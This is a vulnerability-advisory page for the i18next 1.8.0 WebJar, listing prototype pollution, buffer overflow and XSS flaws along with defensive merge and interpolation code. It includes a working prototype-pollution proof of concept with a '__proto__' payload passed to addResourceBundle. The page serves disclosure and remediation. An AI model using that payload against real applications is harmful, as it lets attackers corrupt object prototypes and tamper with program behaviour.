org.webjars.bower:i18next@1.8.0 vulnerabilities

  • latest version: 8.4.2

  • first published: 9 years ago

  • latest version published: 7 years ago

  • licenses detected

  • package manager

  • Direct Vulnerabilities

    Known vulnerabilities in the org.webjars.bower:i18next package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability | Vulnerable version
    • Severity: High
    Prototype Pollution

    org.webjars.bower:i18next is an internationalization framework for the browser or any other JavaScript environment (e.g. Node.js).

    Affected versions of this package are vulnerable to Prototype Pollution via getLastOfPath() in i18next.js.

    How to fix Prototype Pollution?

    There is no fixed version for org.webjars.bower:i18next.

    Vulnerable versions: [0,)
    • Severity: Medium
    Prototype Pollution

    org.webjars.bower:i18next is an internationalization framework for the browser or any other JavaScript environment (e.g. Node.js).

    Affected versions of this package are vulnerable to Prototype Pollution. This vulnerability relates to the addResourceBundle API, which internally uses the deepExtend function (https://github.com/i18next/i18next/blob/master/i18next.js#L361-L370) to merge new translations into the existing ones. If user-controlled input reaches this API, an attacker can overwrite and pollute the object prototype of the program.

    PoC

    import i18n from "i18next";

    // Initialise with ordinary translation resources.
    i18n.init({
      resources: {
        en: {
          namespace1: { key: 'hello from namespace 1' },
          namespace2: { key: 'hello from namespace 2' }
        },
        de: {
          namespace1: { key: 'hallo von namespace 1' },
          namespace2: { key: 'hallo von namespace 2' }
        }
      }
    });

    // JSON.parse creates an own "__proto__" property, which deepExtend then walks into.
    var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
    i18n.init({ resources: {} });
    // deep = true, overwrite = true: the payload is deep-merged into the existing bundle.
    i18n.addResourceBundle('en', 'namespace1', JSON.parse(malicious_payload), true, true);

    console.log(i18n.options.resources);
    // a newly created empty object has the vulnerable property
    console.log({}.vulnerable);
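The defensive counterpart to the PoC, as an added example that is not i18next's deepExtend and not part of this advisory: a deep merge that refuses to walk into `__proto__`, `constructor` or `prototype`, plus a validator that reports such keys in untrusted input before any merge happens. The function names (`safeDeepExtend`, `findUnsafeKeys`, `FORBIDDEN_KEYS`) and the flat resource-bundle shape are assumptions chosen here; the payload string is the one from the PoC above, constructed inline.

```javascript
// Added example: a deep-merge hardened against prototype pollution.
// Not i18next's deepExtend; names (safeDeepExtend, findUnsafeKeys) are chosen here.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Validation at the trust boundary: walk untrusted input and return the dotted
// paths of every key that would reach the prototype chain during a deep merge.
function findUnsafeKeys(input, path = []) {
  const hits = [];
  if (!isPlainObject(input)) return hits;
  for (const key of Object.keys(input)) {          // own enumerable keys only
    const here = [...path, key];
    if (FORBIDDEN_KEYS.has(key)) hits.push(here.join('.'));
    hits.push(...findUnsafeKeys(input[key], here));
  }
  return hits;
}

// Deep merge that skips forbidden keys and only writes own properties of plain
// objects, so a source of {"__proto__": {...}} can never reach Object.prototype.
function safeDeepExtend(target, source, overwrite = false) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;          // never descend into the prototype chain
    const value = source[key];
    if (isPlainObject(value)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) {
        target[key] = {};                           // fresh container, never an inherited one
      }
      safeDeepExtend(target[key], value, overwrite);
    } else if (overwrite || !hasOwn(target, key)) {
      target[key] = value;
    }
  }
  return target;
}

// Replays the advisory's payload (constructed here) against the hardened merge.
function demo() {
  const bundle = { key: 'hello from namespace 1' };
  const payload = JSON.parse('{"__proto__":{"vulnerable":"Polluted"}}');
  const unsafe = findUnsafeKeys(payload);           // ['__proto__']
  safeDeepExtend(bundle, payload, true);
  return {
    unsafe,
    bundleKeys: Object.keys(bundle),                // ['key']: nothing from the payload was merged
    polluted: ({}).vulnerable !== undefined,        // false: Object.prototype untouched
  };
}

console.log(demo());
```

`findUnsafeKeys` is the cheap check to run on any JSON that arrives over a network boundary before it is handed to a merge routine; `safeDeepExtend` is the belt-and-braces fix for the merge itself, since `Object.keys` plus an explicit deny-list means an own `__proto__` property produced by `JSON.parse` is simply never visited.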

    How to fix Prototype Pollution?

    There is no fixed version for org.webjars.bower:i18next.

    Vulnerable versions: [0,)
    • Severity: Medium
    Buffer Overflow

    org.webjars.bower:i18next is an internationalization framework for the browser or any other JavaScript environment (e.g. Node.js).

    Affected versions of this package are vulnerable to Buffer Overflow. It is possible to cause a buffer overflow by making a translation recursive, i.e. a translation that refers back to itself.

    How to fix Buffer Overflow?

    There is no fixed version for org.webjars.bower:i18next.

    Vulnerable versions: [0,)
    • Severity: Medium
    Cross-site Scripting (XSS)

    org.webjars.bower:i18next is an internationalization framework for the browser or any other JavaScript environment (e.g. Node.js).

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) because the interpolation resolution code in translate.js loops over each key in the dictionary and applies the replacements one at a time. Combined with i18next's unescaped-suffix feature, this may allow an attacker to use the name of another key in the dictionary to inject code into the browser.
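The property to preserve in an interpolator is that substituted text is never scanned again: if replacements are applied key by key, the output of one replacement becomes input to the next, and a value that contains another placeholder's name gets expanded in a later round. As an added example that is not i18next's translate.js and not part of this advisory, here is a single-pass interpolator that escapes values by default. The `{{name}}` placeholder syntax, the `escapeValue` option and the function names are assumptions chosen here, not i18next 1.x's own syntax; the sample values are constructed.

```javascript
// Added example: a single-pass interpolator (not i18next's translate.js).
// Placeholder syntax {{name}} and the function names are assumptions made here.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Every placeholder is resolved in ONE pass over the original template, and the
// substituted text is never rescanned, so a value that happens to contain another
// placeholder's name stays literal instead of being expanded in a later round.
function interpolate(template, values, { escapeValue = true } = {}) {
  return template.replace(/\{\{\s*([\w.]+)\s*\}\}/g, (match, name) => {
    // Only own keys of the values object: inherited names such as "constructor" are not placeholders.
    if (!Object.prototype.hasOwnProperty.call(values, name)) return match;
    const raw = values[name];
    return escapeValue ? escapeHtml(raw) : String(raw);
  });
}

function demo() {
  // Constructed sample: one value is HTML, another is the literal name of a second placeholder.
  const values = { name: '{{html}}', html: '<b>bold</b>' };
  return interpolate('Hi {{name}}: {{html}} {{missing}}', values);
  // → 'Hi {{html}}: &lt;b&gt;bold&lt;/b&gt; {{missing}}'
}

console.log(demo());
```

The `escapeValue: false` path exists only because some callers genuinely need markup; treat it like any other unescaped-output API and never let it be selected by the name of a dictionary key that untrusted input can influence.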

    How to fix Cross-site Scripting (XSS)?

    Upgrade org.webjars.bower:i18next to version 1.10.3 or higher.

    Vulnerable versions: [,1.10.3)